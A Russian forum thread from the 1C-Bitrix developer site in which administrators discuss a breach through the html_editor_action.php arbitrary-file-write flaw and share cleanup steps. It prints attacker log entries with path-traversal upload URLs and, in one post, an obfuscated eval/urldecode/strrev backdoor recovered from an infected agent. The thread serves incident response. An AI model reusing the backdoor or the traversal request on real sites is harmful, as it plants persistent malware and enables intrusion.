1С-Битрикс Разработчикам

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#391 0 28.02.2023 06:19:44 Иван Петров, Это уже "вторичка". Надо искать пост который этот файл создал. Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7075538

Заглянувший

Сообщений: 3 Регистрация: 26.02.2023

#392

28.02.2023 10:21:04

Цитата
написал: Иван Петров, Это уже "вторичка". Надо искать пост который этот файл создал.

Ну вот такое нашел в логе за январь:

Скрытый текст

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#393

28.02.2023 10:29:56

тут я вижу попытки залезть через
html_editor_action.php и модуль vote
все они пофикшены в актульных обновлениях...

у вас все актуальные обновления были установлены?

странно, что на vote ответ 200 - вроде ж его нет у Вас?

если в итоге в агентах нечисть, то это скорее всего уязвимость html_editor_action.php
в vote там попроще ломают, там агента делать необходимости нет

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#394 0 28.02.2023 10:31:30 а вот это первый раз встречаю "POST /bitrix/tools/mail_entry.php/. ./. ./. ./bitrix/tools/html_editor_action.php HTTP/1.1" думаю всё тот же html_editor_action.php Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 1496793 Заглянувший Сообщений: 2 Регистрация: 28.02.2023	#395 0 28.02.2023 11:39:11 Проверьте у кого-нибудь есть файл /bitrix/tools/spread.php ? Его еще в сентябре могли загрузить

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#396 0 28.02.2023 11:50:32 нет такого Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 1496793

Заглянувший

Сообщений: 2 Регистрация: 28.02.2023

#397

28.02.2023 12:03:22

В продолжение про spread.php
Есть такой лог
a:5:{s:5:"files";a:1:{s:10:"spread.php";a:9:{s:4:"name";N;s:5:"~name";s:10:"spread.php";s:8:"tmp_name";s:160:"/home/n/public_html/upload/tmp/BXTEMP-2023-01-01/12/bxu/2ed8be0119c7c154ae538a93d568a1cb/. ./. ./. ./. ./. ./. ./bitrix/tools//spread.php";s:4:"type";s:10:"text/x-php";s:4:"size";i:545;s:5:"error";i:0;s:4:"copy";s:10:"spread.php";s:3:"url";s:165:"https://домен/bitrix/tools/html_editor_action.php?bxu_info[CID]=x& bxu_info[mode]=view& bxu_info[hash]=..%2F..%2F..%2F..%2F..%2F..%2Fbitrix%2Ftools%2F_spread.php";s:13:"sizeFormatted";s:6:"545 Б";}}s:6:"status";s:10:"inprogress";s:4:"hash";s:31:"../. ./. ./. ./. ./. ./bitrix/tools/";s:2:"id";s:31:"../. ./. ./. ./. ./. ./bitrix/tools/";s:7:"~status";s:10:"inprogress";}

Документ https://alt3r.eg0.ru/p0c5/attacking_bitrix.pdf
Заголовок 2.13. Arbitrary File Write ( html_editor_action.php )

Может быть у всех лежит файл, который был загружен несколько месяцев назад (до обновлений Битрикса) и только сейчас его начинают запускать.

Пользователь 2663075

Постоянный посетитель

Сообщений: 93 Баллов: 17 Регистрация: 20.11.2018

#398

28.02.2023 14:06:24

Цитата

написал:
Мы у себя также обнаружили файл в процессах с вредоносным кодом

Код
bitrix+ 10296 0.0 0.0 201500 21048 ? S 03 : 30 0 : 05 php / var /www/bitrix/src/app/l.php

А так также Агент с вредоносным кодом

Код

 $arAgent["NAME"];//_(9.)H'5t}>qo7ouj7 < ( > !)U}3/]6u8u}Q%' //>w7u5ST < "IA.xY:8eeval       /* 9 ! ._IkZ ) 1   DcpyxJA \" F / C1ra / 9 + E /&^ 15 > Z"yd3y)vk$p6FN*/(/*]~P@.iKSyR3+hRfkLK~GUv3ZgJ!6dmtClEc{/*/urldecode#Dcc5L6|8cI8+~/?Y(/*I$s6IW3YhccLGyx^v2BAJN@ZnzRYVa+*/strrev/*8/WKh@/MlVGf6?yY`E)" w}SRU5]V{]n+5:tVJCC"j+8+%rlK{n*/(/* GC5%z1bi=x%3OOVsQB~jM%]:PZ*|Ox|v < 3|8D`"bY(u* /' b3 % 56 % 57 % 27 % 47 % 02 % e6 % 27 % 57 % 47 % 56 % 27 % 02 % 02 % 02 % 02 % 02 % 02 % 02 % 02 % a0 % d7 % 02 % 02 % 02 % 02 % a0 % b3 % 92 % 27 % 42 % 82 % c6 % 16 % 67 % 56 % 02 % 02 % 02 % 02 % a0 % 56 % 37 % c6 % 56 % 02 % 02 % 02 % 02 % a0 % d7 % 02 % 02 % 02 % 02 % a0 % b3 % 27 % 42 % 02 % d3 % 02 % 47 % c6 % 57 % 37 % 56 % 27 % f5 % c6 % 16 % 67 % 56 % 42 % 02 % 02 % 02 % 02 % a0 % b3 % 92 % 22 % 13 % 02 % d3 % 02 % 44 % 94 % 02 % 54 % 25 % 54 % 84 % 75 % 02 % 72 % e4 % 72 % 02 % d3 % 02 % 44 % f4 % 94 % 25 % 54 % 05 % f5 % 35 % 94 % 02 % c2 % 03 % 63 % 02 % d3 % 02 % c4 % 14 % 65 % 25 % 54 % 45 % e4 % 94 % f5 % 45 % e4 % 54 % 74 % 14 % 02 % 45 % 54 % 35 % 02 % 47 % e6 % 56 % 76 % 16 % f5 % 26 % 02 % 54 % 45 % 14 % 44 % 05 % 55 % 22 % 82 % 97 % 27 % 56 % 57 % 15 % e3 % d2 % 24 % 44 % 42 % 02 % 02 % 02 % 02 % a0 % b7 % 92 % 92 % d5 % 22 % 87 % 87 % 87 % 56 % 27 % f6 % 47 % 37 % 56 % 27 % 22 % b5 % 45 % 35 % 54 % 55 % 15 % 54 % 25 % f5 % 42 % 82 % 47 % 56 % 37 % 37 % 96 % 82 % 66 % 96 % 02 % 02 % 02 % 02 % a0 % b3 % 72 % b3 % 92 % 82 % 16 % 47 % 16 % 44 % 47 % 96 % d6 % 26 % 57 % 37 % a3 % a3 % 56 % c6 % 26 % 16 % 45 % 16 % 47 % 16 % 44 % 27 % 56 % 47 % e6 % 57 % f6 % 34 % c5 % c5 % 37 % 36 % 96 % 47 % 97 % c6 % 16 % e6 % 14 % c5 % c5 % e6 % 96 % 16 % d4 % c5 % c5 % 87 % 96 % 27 % 47 % 96 % 24 % c5 % c5 % 72 % 02 % d3 % 02 % 27 % 42 % 02 % 02 % 02 % 02 % a0 % b7 % 56 % 37 % c6 % 56 % 02 % 02 % 02 % 02 % a0 % d7 % 02 % 02 % 02 % 02 % a0 % d7 % 02 % 02 % 02 % 02 % a0 % b3 % 47 % 96 % 87 % 56 % 02 % 02 % 02 % 02 % a0 % b7 % 92 % 56 % 42 % 02 % e6 % f6 % 96 % 47 % 07 % 56 % 36 % 87 % 54 % 82 % 02 % 86 % 36 % 47 % 16 % 36 % 02 % 02 % 02 % 02 % a0 % d7 % 02 % 02 % 02 % 02 % a0 % b3 % 92 % 92 % 92 % d5 % 22 % 87 % 87 % 87 % 96 % 27 % 47 % 96 % 26 % 22 % b5 % 45 % 35 % 54 % 55 % 15 % 54 % 25 % f5 % 42 % 82 % 56 % 46 % f6 % 36 % 56 % 46 % c6 % 27 % 57 % 82 % 56 % 46 % f6 % 36 % 56 % 46 % c6 % 27 % 57 % 82 % c6 % 16 % 67 % 56 % 02 % d3 % 02 % 56 % 42 % 02 % 02 % 02 % 02 % a0 % b7 % 97 % 27 % 47 % 02 % 02 % 02 % 02 % a0 % a0 % b3 % 92 % 22 % 13 % 02 % d3 % 02 % 44 % 94 % 02 % 54 % 25 % 54 % 84 % 75 % 02 % 72 % e4 % 72 % 02 % d3 % 02 % 74 % e4 % 94 % e4 % e4 % 55 % 25 % 02 % c2 % 03 % 02 % d3 % 02 % 45 % e4 % 55 % f4 % 34 % f5 % 95 % 25 % 45 % 54 % 25 % 02 % c2 % c4 % c4 % 55 % e4 % 02 % d3 % 02 % b4 % 34 % 54 % 84 % 34 % f5 % 54 % 45 % 14 % 44 % 02 % 45 % 54 % 35 % 02 % 47 % e6 % 56 % 76 % 16 % f5 % 26 % 02 % 54 % 45 % 14 % 44 % 05 % 55 % 22 % 82 % 97 % 27 % 56 % 57 % 15 % e3 % d2 % 24 % 44 % 42 % 02 % 02 % 02 % 02 % a0 % b7 % 92 % 92 % d5 % 22 % 87 % 87 % 87 % 96 % 27 % 47 % 96 % 26 % 22 % b5 % 45 % 35 % 54 % 55 % 15 % 54 % 25 % f5 % 42 % 82 % 47 % 56 % 37 % 37 % 96 % 82 % 66 % 96 % 02 % 02 % 02 % 02 % a0 % 02 % 02 % 02 % 02 % 02 % 02 % 02 % 02 % a0 %'/*}+ o | u > #TYS0cP_\NWyaT2'55io>_yv*/)       #T/N82kY'xApsEIx`?}`2_DB3;dm)    /*pqPWM{~IE(WOT)l=?x[>zBI# yCBI#B:usrCorl6zEeOOSmoMJ.*/)/*LlRo0|sR8iF+.7}{MxB4Iqg8a5bp^OJ+=|z*/;/*"3YH?h_>d.8'Cay+z\A]M!.x,Lu({qx}&SFE < 'c!6|)Y^* /

Помогли следующие шаги:
1. Восстановить сайт из незараженной копии
2. Удалить vote модуль, мы ним не пользуемся
3. Убить вредоносный процесс (/var/www/bitrix/src/app/l.php)
4. Восстановить агент, который был заражен. Там изначально был просто код CEvent::CleanUpAgent();
5. Удалить файлы php, которые были созданы в корневой папке сайта и в /bitrix/admin (/bitrix/admin/f408f2b7df70.php, /f408f2b7df70.php)

Пока файл перестал создаваться, хотя запросы продолжаются.
Будем наблюдать.

Смотрите еще в /bitrix/admin/ файлы больше 100-200 байт с непонятными и странными именами.
Так же могут быть вложены папки с такими же названиями как более верхний уровень.

Оптимизация скорости работы сайта и Оптимизация для сео (техническая оптимизация)

Пользователь 44943

Постоянный посетитель

Сообщений: 135 Баллов: 21 Регистрация: 03.07.2009

#399

01.03.2023 01:31:59

Цитата
написал: когда .htaccess похерели на сайте клиента, я несколько тысяч инфицированных .htaccess поиском нашел пришлось с бэкапа восстановиться

да он почти в каждой папке появился.

Пользователь 44943 Постоянный посетитель Сообщений: 135 Баллов: 21 Регистрация: 03.07.2009	#400 1 01.03.2023 01:35:51 Обновили битрикс. Но файл в bitrix/admin сегодня опять создался.

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером